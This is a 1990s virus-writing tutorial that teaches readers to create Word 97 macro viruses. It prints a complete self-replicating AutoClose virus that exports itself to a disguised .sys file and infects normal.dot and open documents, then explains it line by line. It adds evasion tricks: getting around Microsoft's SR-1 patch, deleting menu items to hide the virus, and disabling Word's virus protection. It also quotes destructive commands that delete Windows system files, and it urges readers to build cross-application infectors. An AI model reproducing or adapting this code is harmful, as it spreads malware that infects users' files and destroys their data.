Basically this is a little essay to clear up some misconceptions about VBA, Word 97 and SR-1. The Only VBA Tutorial You Will Ever Need by VicodinES (with assistance from Lord Natas) First lets cover a few things:  VBA is a lame language, TRUE!  Most macro viruses are crap and lack any original ideas, TRUE!  Only an idiot would write a macro virus, FALSE! False? How can I say that? VBA is actually fun. It's just that most macro virus writers have no vision or creativity. Most people start with macros and then move on. They usually just find an existing macro and change the payload and claim to have written a virus. This is where the bad name for macros comes from. So why write a Word 97 macro virus? 1. VBA is easy, fast and powerful if you put some thought into it. 2. It's a good virus language if you have very little free time (LIKE ME!) 3. So little has been done with it that it's easy to stand out 4. Macro viruses spread fast and can be fun to read about Things you should know: 1. Subroutines are stored in Modules 2. You can access the Visual Basic editor in Word by pressing ALT-F11 3. To insert a new module, go to Insert|Module 4. If you don't have the VB help file already installed, install it! It is the best reference you can have. How hard is a Word 97 Macro virus? Not very ... the example below is a fully functioning Word97 macro virus... ------------------CUT HERE-------------------------------------- Attribute VB_Name = "demo" Sub AutoClose() On Error Resume Next Application.VBE.ActiveVBProject.VBComponents("demo").Export "c:\demo.sys" For I = 1 To NormalTemplate.VBProject.VBComponents.Count If NormalTemplate.VBProject.VBComponents(I).Name = "demo" Then NormInstall = True Next I For I = 1 To ActiveDocument.VBProject.VBComponents.Count If ActiveDocument.VBProject.VBComponents(I).Name = "demo" Then ActivInstall = True Next I If ActivInstall = True And NormInstall = False Then Set Dobj = NormalTemplate.VBProject _ Else If ActivInstall = False And NormInstall = True Then Set Dobj = ActiveDocument.VBProject Dobj.VBComponents.Import ("c:\demo.sys") End Sub ------------------CUT HERE-------------------------------------- The logic behind this virus: 1. Export itself to c:\demo.sys (the virus source code) 2. Check to see if its installed in normal.dot - if so, set variable 3. Check to see if its installed in the active document - of so, set variable 4. If not installed in normal.dot, import c:\demo.sys there 5. If not installed in active document, import c:\demo.sys there Walk through of the code: Attribute VB_Name = "demo" This tells word that this is the name of our module. You must import this module into word. Sub AutoClose() Subroutine AutoClose. It activates whenever you close a document On Error Resume Next If there is an error, just execute the next instruction For I = 1 To NormalTemplate.VBProject.VBComponents.Count Repeat the following code for the number of modules in normal.dot If NormalTemplate.VBProject.VBComponents(I).Name = "demo" Then NormInstall = True If a module named "demo" exists in normal.dot, make the NormInstall variable true Next I Do it again For I = 1 To ActiveDocument.VBProject.VBComponents.Count Repeat the following for the number of modules in the active document If ActiveDocument.VBProject.VBComponents(I).Name = "demo" Then ActivInstall = True If a module named "demo" exists in the active doc, make ActivInstall variable true Next I Do it again If ActivInstall = True And NormInstall = False Then Set Dobj = NormalTemplate.VBProject If we are installed in the current document but not normal.dot, set to import into normal.dot Else If ActivInstall = False And NormInstall = True Then Set Dobj = ActiveDocument.VBProject Else, if we are not installed in the current document but in normal.dot, set to import into the current doc Dobj.VBComponents.Import ("c:\demo.sys") This will import c:\demo.sys into normal.dot or the active document, depending on the variable set above. Dobj was set as the object to infect. It's a good idea to work with objects. Word 97 is object oriented and you have the ability to set and reference objects. This saves code, time and creates efficiency. For example we need to reference ActiveDocument.VBProject lots of times in a virus so why not set it to an object. For example: Set Dobj = ActiveDocument.VBProject Then from now on we can just reference Dobj.VBComponents.Import ("c:\demo.sys") That's it! That's all you would ever need for a macro virus. It's even SR-1 compatible. 13 lines of VBA code are all you need for a Word 97 macro virus. If you plan to write a Word 97 macro virus you need to be ULTRA creative to stand out and I'll tell you from experience that very few macro viruses stand out. First thing you must get into your head is that the Microsoft SR-1 patch makes these commands invalid - WordBasic.MacroCopy and Application.OrganizerCopy !!! STOP USING THEM !!! First and foremost the SR-1 patch does not allow you to copy a macro from the normal.dot to a document!!! So stop writing useless code. Most viruses, including the ones generated by most virus construction kits, aren't SR-1 compatible. Microsoft is planning to release SR-2 sometime this summer, which will most likely stop these methods. However, as always we will find a way around these pathetic attempts at 'security'. Anyhow... How can you get around that? 1. Export your macro code : Application.VBE.ActiveVBProject.VBComponents("demo").Export "c:\demo.sys" 2. Import the macro code into the new document: With .VBComponents.Import("c:\demo.sys") In the above example I export the macro code to a hidden file (by default) called demo.sys. This file by name would be left alone if found by most users since they would believe it is a system file. (1) Other extensions that will be hidden by default are: DLL, VXD, 386, and DRV. Also you DO NOT have to save the infected document as a template!! That will only screw things up in Word 97 and it's completely unnecessary! But you do need to save the new infected document in Word 97 document format otherwise you will lose the macro : ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument If you don't save it, the user could close the document without having the macro saved! Stop writing macro trojans!! What good is a macro virus that deletes system files after 15 infections? It's useless and just shows how short you are on real ideas. There are so many people writing macros that do this: Kill "c:\windows\*.*" Kill "c:\windows\system\*.*" Kill "c:\My Documents" Does anyone think this is a good virus? If you put it into a *.bat file what would you call it? A trojan horse? Exactly!! Such viruses have little chance of spreading, show a total lack of imagination, and give a bad name for viruses. Only those without imagination would code shit like that! Ok lets go over some macro virus basics : Stealth : CommandBars("Tools").Controls("Macro").Delete CommandBars("Tools").Controls("Templates and Add-Ins...").Delete CommandBars("Format").Controls("Style...").Delete * *the reason why you want to delete this is because you can get to organizer through this. Turn off the virus protection and normal save prompt : Options.VirusProtection = False Options.SaveNormalPrompt = False Error handler : On Error Resume Next /or On Error GoTo Fuck * * Fuck is just a break-out point that I sometimes use. You can specify any name for a break-out point. It sets a spot where that code should go when an error arises. Example : On Error GoTo Fuck Code (1)-----| run ok Code (2)-----| run ok Code (3)-----| error Code | (Code skipped) Fuck: | Code (4)-----| this is run now Now, if you're going to bother writing a Word 97 macro virus then do it right. Try to some new ideas. The best new idea right now is cross application infection. Currently there are two macro viruses that do this. 1. Cross.Poppy (an Access/Word infector written by me) 2. Strange Days (an Excel/Word infector written by Reptile) Why should you write a cross application infector? 1. You can infect another application without the users knowledge (no macro virus protection can stop it) 2. It gives your virus a better chance for survival 3. It hasn't been perfected You could also try your hand at "Class Object" infection. Class object macros are a good way to write new macro viruses because by default Microsoft gave them built in stealth. Even the most basic class virus can not be seen from the Macro Organizer and does not contain any obvious modules. Keep looking for other ways to do things. Don't just continue hacking old OrganizerCopy macros and adding STUPID payloads. Use your head and think!! Do something INTERESTING!! Just because you haven't seen someone do it in Word or Excel before doesn't mean it can't be done!! If you working in VBA your already working with a handicap and that handicap is the 2000+ other macro viruses that came before yours and gave macros a bad name. -------------------------------------------------------------------------- (1) - system file export name idea taken from Strange Days by Reptile (2) - trojan code taken from Satan666 by Mikee